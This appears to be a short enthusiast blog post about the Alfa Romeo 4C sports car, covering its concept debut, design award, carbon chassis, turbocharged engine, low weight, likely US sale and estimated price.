I am occasionally a fantasist. Specifically, I am an Alfa Romeo fantasist. Alfa Romeo keep fueling my dreams and the projected launch next summer of the stunning 4C isn’t helping matters.
First unveiled last year as a concept at the Geneva Motor Show, it caused quite a sensation prompting AlfaRomeo to put it in to production. The 4C also bagged this year’s Concorso d’Eleganza Design Award at Villa d’Este in northern Italy proving that ADD (Alfa Dream Disorder) is commonplace within our car community.
This mid-engined Italian beauty rolls on a carbon chassis and will produce more than 200 HP (considerably more allegedly) from its 1.8L, turbocharged 4 cylinder engine. The remarkable thing is that Alfa Romeo is determined to keep the weight down to a positively anorexic 900 Kg’s.
Recent spy shots of the little Alfa testing have been hitting the interwebs recently and show little change from the original design. The inclusion of side repeaters on the front wheel arch, however, indicate that Alfa Romeo intend to sell the 4C in the United States which was a market they pulled out off back in 1995.
However, with an estimated price tag of around $60,000 it will still be well out of my reach. I will have to make do with playing around with the free 4C App. that you can download HERE and content myself with dreams of the ‘Cross and the Snake’.
